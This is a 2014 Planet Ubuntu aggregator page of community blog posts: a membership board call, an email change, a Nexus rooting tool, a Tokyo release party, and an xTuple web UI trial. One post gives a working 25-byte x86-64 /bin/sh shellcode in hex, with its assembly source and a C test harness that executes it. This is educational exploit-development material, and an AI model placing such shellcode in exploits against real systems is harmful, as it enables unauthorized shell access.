Additionally, those sitting on membership boards are current Ubuntu Members with a proven track record of activity in the community. They have shown themselves over time to be able to work well with others and display the positive aspects of the Ubuntu Code of Conduct. They should be people who can discern character and evaluate contribution quality without emotion while engaging in an interview/discussion that communicates interest, a welcoming atmosphere, and which is marked by humanity, gentleness, and kindness. Even when they must deny applications, they should do so in such a way that applicants walk away with a sense of hopefulness and a desire to return with a more complete application rather than feeling discouraged or hurt.

Without sufficient people to run the 12:00 UTC session we are in a position where it is possible that we’ll be forced to move to running only one session for Ubuntu Membership. We’d hate to see this happen, but if so, the Community Council will work closely with the Membership Board to make sure we serve the needs of the APAC region, possibly through a modified membership application process for people who are unable to attend the 22:00 UTC session.

Elizabeth K. Joseph, on behalf of the Ubuntu Community Council

Zygmunt Krynicki: Moving to my own email address

Planet Ubuntu - Thu, 2014-06-05 17:02
So I've been using Gmail for a good while. I have three accounts, one personal, one for Canonical personality and one dead for my Linaro personality.

Using Google products with more than one account is a frustrating experience. Especially with hangouts that apparently just don't work at all without private browsing. But that's just a minor annoyance.

The Linaro experience taught me that nothing lasts unless you own it. With that in mind I've decided to move my primary personal address away from @gmail.com to my own domain.

My new address is related to my twitter handle @zygoon (since my usual nickname was not available) on my own domain, zygoon.pl. If, by any chance, you have zkrynicki@gmail.com in your address book I'd like to ask you to update it to:

me@zygoon.pl
I've published updated GPG keys in case you were wondering.

Jos&eacute; Antonio Rey: Need help rooting or flashing your Nexus device? The solution is here!

Planet Ubuntu - Thu, 2014-06-05 03:40

A couple days ago, Android 4.4.3 was released. I have a Nexus device, so I was waiting for the OTA update. I had the 4.4.2 update on the queue, though, so I decided to go ahead and apply it. But my recovery partition had the TeamWin Recovery installed, which didn’t like the upgrade. So, I asked a friend of mine and he ended up giving me a simple solution for my flashing and rooting problems: Nexulockr.

Nexulockr is a program written by Ian Santopietro, which makes the task of managing your Nexus device (in terms of the previously mentioned stuff) way too easy. So, I went ahead and downloaded the Android 4.4.3 factory image for my device, and patiently waited. Well, I couldn’t expect to download it quickly with this 400 KB/s connection. While I did, the new Nexulockr version finished uploading, and I was getting ready to add the PPA to my machine. Doing it is as simple as executing the following commands:

sudo add-apt-repository ppa:nexulockr-dev/nexulockr-beta
sudo apt-get update
sudo apt-get install nexulockr

That, after another bit of waiting, installed Nexulockr into my machine. And I was ready to go! I opened the program and this magic screen appeared (with all my device info, of course):

The process of flashing the image was super quick and easy. I just clicked on the right button, and this other window appeared:

In the factory image I downloaded, I got lots of .img files compressed into one gzip. Problem is, sometimes you don’t know what image to flash first or last. Nexulockr solves this problem by having the buttons in the order the images need to be flashed. I went ahead and started flashing the images. No additional efforts were needed on my side, just selecting the image and clicking that automagic button while my phone was connected.

The next day, I found out my root had disappeared (for obvious reasons), so I had to root my phone again. Guess what – Nexulockr also helped me with that. I went ahead, connected my phone, and clicked the “Root” button. I selected “Root device” and I just had to do one press on my phone to confirm the root. And that was it. No tedious command line interaction!

The developer states that Nexulockr may work with some other devices, but this is not guaranteed. Still, for all those of you with Nexus devices, this may come in handy at some point. As I am writing this, a build for the beta package is ongoing. So, why not give it a try after it’s done?


Fumihito YOSHIDA: Ubuntu 14.04 LTS release party + Offline meeting 14.04 Tokyo

Planet Ubuntu - Thu, 2014-06-05 03:11
A few weeks ago, Ubuntu Japanese Team convene "Ubuntu 14.04 LTS release party + Offline meeting 14.04" with co-sponsored by GREE, Inc and around 100 attendances. That event combine the hackathon and seminar sessions, we have it both ways.

Virtual tour:
1) A lot of sandwitchs (for 100 enlister) and party dishes.


Note: These represent just the tip of the iceberg. But, they completely-disappeared within 20 minutes....:)


2) A lot of Ubuntu 14.04 LTS CDs (From LoCo kit, thanks Canonical!) with *pretty* stuffed Tahr and Unicorn (owner: Shibata Mitsuya).






3) Terazono Junya with LipoD(Lipovitan D, Japanese popular energy drink).
 


4) Large screen (very nice, thanks GREE!)



5) Retrospective by Jun. Ubuntu Japanese Team create "Ubuntu Japanese Remix" for a long time (about 8years), He is great leader.




6) Seminar by Tokura Aya (Microsoft). She is evangelist/image character of Microsoft Azure/Cloud in Japan.
 



7) Seminar by Shiobara Hiroaki(GMO Internet). He escort "Mikumo-Conoha", the macot fay of "ConoHa" (CMO's Cloud service). 
 

8) Seminar by Yokota Masatoshi(Sakura Internet), He and Mr. Shiobara starts a verbal battle like Wrestling Entertainment (Its entertainment. They keep friendliness and respets, but thats engage in a heated debate. I Know, they give the right hand of fellowship after sessions. :) ).



One of sessions theme are "Retrospective", overview for 10 years of ubuntu.

- "Ubuntu and Me, a certain ubuntu user's voice" by Terazono Junya (indivisual, but he is famous planetary informatics scientist, a.k.a. "Hayabusa project's PR expert with LipoD" ).
- "Retrospective last 10 years" by Kobayashi Jun (Ubuntu Japanese Team)

Another seminar sessions focused "VPS and Cloud production environment with Ubuntu", line-up as follows.

- "Ubuntu + Microsoft Azure, Quickguide before a you use Azure"  by Tokura Aya, a.k.a. "Cloudia Madobe" (Microsoft Corporation).
- "Ubuntu on Microsoft Azure" by Tsumura Akira (Japan Azure User Group)
- "GMO Cloud with Ubuntu 14.04" by Shiobara Hiroaki (GMO Internet)
- "Using Ubuntu on Sakura's VPS/Cloud" by Yokota Masatoshi (Sakura Internet)
- "Using Juju for your Ubuntu environment" by Matsumoto Takenori (Canonical)

Yes, they are awesome presenters(thanks!), they distribute Ubuntu environment as a Cloud/VPS operator. We can use Ubuntu on there VPS/Cloud service with your one-click operation. Excellent!


And, You can check an another report on gihyo.jp (http://gihyo.jp/admin/serial/01/ubuntu-recipe/0325) by Terauchi Yasuyuki (in Japanese), that sponsored by GIHYO.

In closing, I would like to thank you all for convention. Thanks a lot!

David Tomaschik: Minimal x86-64 shellcode for /bin/sh?

Planet Ubuntu - Thu, 2014-06-05 01:54

I was trying to figure out the minimal shellcode necessary to launch /bin/sh from a 64-bit processor, and the smallest I could come up with is 25 bytes: \x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05.

This was produced from the following source:

BITS 64 main: mov rbx, 0xFF978CD091969DD1 neg rbx push rbx xor eax, eax cdq xor esi, esi push rsp pop rdi mov al, 0x3b ; sys_execve syscall

Compile with nasm, examine the output with objdump -M intel -b binary -m i386:x86-64 -D shellcode.

Here's a program for testing:

#include <sys/mman.h> #include <stdint.h> char code[] = "\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05"; int main(){ mprotect((void *)((uint64_t)code & ~4095), 4096, PROT_READ|PROT_EXEC); (*(void(*)()) code)(); return 0; }

I'd like to find a good tool to compile my shellcode, extract as hex, build a test bin, and run it, all in one. Should be a trivial python script, actually.

Daniel Pocock: Trialing the xTuple/PostBooks next generation web UI

Planet Ubuntu - Wed, 2014-06-04 20:35

For some time I've been using PostBooks to keep track of finances. The traditional PostBooks system has a powerful Qt GUI.

The xTuple team have been hard at work creating a shiny new web-based user interface.

The traditional UI has no dedicated server - all users communicate directly with the PostgreSQL database where stored procedures and triggers ensure the correct logic is applied.

The new model provides an xTuple application server that can handle requests from web users and potentially other third-party apps too.

Who is it for?

Some people may feel that the web UI is intended to appeal to mobile users. While it is useful for mobile and tablet devices, this is not strictly the aim, John has discussed this in a blog.

One benefit of the web UI is that accountants and book-keepers do not need to have a copy of every exact PostBooks version that every client is using. Given that many people only need their accountant to look at their books for just a few hours at the end of each year, the ease of access with a web UI will make a big difference.

Trying it out quickly

The xTuple Git repository provides a script to install the whole server quickly. Initially it just supported a single Ubuntu release, I just contributed some tweaks to generalize it for Debian wheezy and potentially other releases. It doesn't appear too difficult to generalize it further for Fedora or RHEL users.

To get going, I recommend trying it in a fresh virtual machine, either in a server environment or desktop VirtualBox solution. The installation script will install various packages on the machine and mess about with the PostgreSQL setup so you will not want to run the automated setup script on any machine where you have existing databases.

Once the virtual machine is setup, make sure sudo is installed and configured:


# apt-get install sudo
# visudo

and then run the install as your normal user:


git clone --recursive git://github.com/xtuple/xtuple.git
cd xtuple
git remote add XTUPLE git://github.com/xtuple/xtuple.git
git fetch XTUPLE
git checkout `git describe --abbrev=0`
chmod a+x scripts/install_xtuple.sh
scripts/install_xtuple.sh

If all goes well, 5-10 minutes later it is ready to run:


cd node-datasource
node main.js

The port numbers will appear on the screen and you can connect with a web browser.

Trying it out

Despite my comments above to the effect that this is not primarily aimed at mobile, the first and second device I tested with were both mobile devices, Samsung Galaxy S3 and a Samsung Galaxy Note 3. I feel the Note is far better for this type of application, primarily due to screen size and the fact that most of the forms in the application have fields that launch popup menus. It appears to work in both Chrome and Firefox on these devices.

One handy feature is that the mobile device can dial numbers directly from the CRM address book, this is facilitated with the tel URI.

My impression is that this is still a product that is in the final stages of development, although some people will be able to use it almost immediately. One significant thing to note is that the database schema is very stable due to the long history of the traditional xTuple/PostBooks products.

Pages

Subscribe to Free Software Magazine aggregator